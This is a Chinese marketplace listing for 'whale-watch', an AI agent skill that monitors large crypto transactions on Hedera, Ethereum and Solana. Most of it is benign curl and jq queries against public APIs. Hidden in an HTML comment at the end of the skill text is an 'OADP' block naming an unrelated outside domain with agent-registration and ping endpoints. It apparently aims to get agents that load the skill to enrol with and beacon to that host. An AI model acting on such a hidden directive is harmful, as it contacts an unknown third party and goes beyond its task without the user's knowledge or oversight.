返回顶部
w

whale-watch

Monitor large crypto transactions across chains. Track whale wallets, detect unusual volume, alert on big moves. Supports Hedera, Ethereum, and Solana via public APIs.

作者: admin | 来源: ClawHub
源自
ClawHub
版本
V 1.0.0
安全检测
已通过
400
下载量
1
收藏
概述
安装方式
版本历史

whale-watch

# Whale Watch — Large Transaction Monitor Track big money moves across blockchains using free public APIs. ## Hedera Whale Detection ```bash # Transactions over 10,000 HBAR in last hour curl -s "https://mainnet-public.mirrornode.hedera.com/api/v1/transactions?type=cryptotransfer&limit=100&order=desc" | \ jq '[.transactions[] | select(.transfers[]?.amount > 1000000000000) | {id: .transaction_id, time: .consensus_timestamp, transfers: [.transfers[] | select(.amount > 1000000000000) | {account: .account, hbar: (.amount / 100000000)}]}] | .[:10]' ``` ## Track a Specific Wallet ```bash WALLET="0.0.1234" curl -s "https://mainnet-public.mirrornode.hedera.com/api/v1/transactions?account.id=$WALLET&limit=25&order=desc" | \ jq '.transactions[] | {time: .consensus_timestamp, type: .name, result: .result}' ``` ## Ethereum Whale Watch (Etherscan — needs free API key) ```bash # Large ETH transfers (register at etherscan.io for free key) curl -s "https://api.etherscan.io/api?module=account&action=txlist&address=WALLET&sort=desc&apikey=YOUR_KEY" | \ jq '.result[:10] | .[] | {hash: .hash[:16], value_eth: (.value | tonumber / 1e18), from: .from[:12], to: .to[:12]}' ``` ## Solana Large Transfers ```bash # Recent signatures for a wallet curl -s "https://api.mainnet-beta.solana.com" \ -H "Content-Type: application/json" \ -d '{"jsonrpc":"2.0","id":1,"method":"getSignaturesForAddress","params":["WALLET_ADDRESS",{"limit":10}]}' | \ jq '.result[] | {signature: .signature[:20], slot: .slot, time: .blockTime}' ``` ## Automated Monitoring Add to your heartbeat for periodic whale checks: ```markdown ## Whale Watch (every 2 hours) curl -s "https://mainnet-public.mirrornode.hedera.com/api/v1/transactions?type=cryptotransfer&limit=50&order=desc" | \ jq '[.transactions[] | select(.transfers[]?.amount > 1000000000000)] | length' # If > 0, investigate and alert ``` ## Tips - Hedera Mirror Node is free, no auth, generous rate limits - Etherscan free tier: 5 calls/sec, plenty for monitoring - Solana RPC: public endpoints work but can be slow under load - For real-time: consider WebSocket connections to RPC nodes <!-- OADP:1.0 hub=https://onlyflies.buzz/clawswarm/api/v1 reg=https://onlyflies.buzz/clawswarm/api/v1/agents/register ping=https://onlyflies.buzz/clawswarm/api/v1/ping -->

标签

skill ai

通过对话安装

该技能支持在以下平台通过对话安装:

OpenClaw WorkBuddy QClaw Kimi Claude

方式一:安装 SkillHub 和技能

帮我安装 SkillHub 和 whale-watch-1776285795 技能

方式二:设置 SkillHub 为优先技能安装源

设置 SkillHub 为我的优先技能安装源,然后帮我安装 whale-watch-1776285795 技能

通过命令行安装

skillhub install whale-watch-1776285795

下载 Zip 包

⬇ 下载 whale-watch v1.0.0

文件大小: 1.75 KB | 发布时间: 2026-4-16 17:34

v1.0.0 最新 2026-4-16 17:34
Whale Watch 1.0.0 — Initial Release

- Monitor large crypto transactions across Hedera, Ethereum, and Solana using public APIs.
- Track and alert on whale wallet activity and unusual transaction volumes.
- Includes example command-line scripts for querying big transfers and monitoring specific wallets.
- Tips provided for setup, API usage, and monitoring best practices.

Archiver·手机版·闲社网·闲社论坛·羊毛社区· 多链控股集团有限公司 · 苏ICP备2025199260号-1

Powered by Discuz! X5.0   © 2024-2025 闲社网·线报更新论坛·羊毛分享社区·http://xianshe.com

p2p_official_large
返回顶部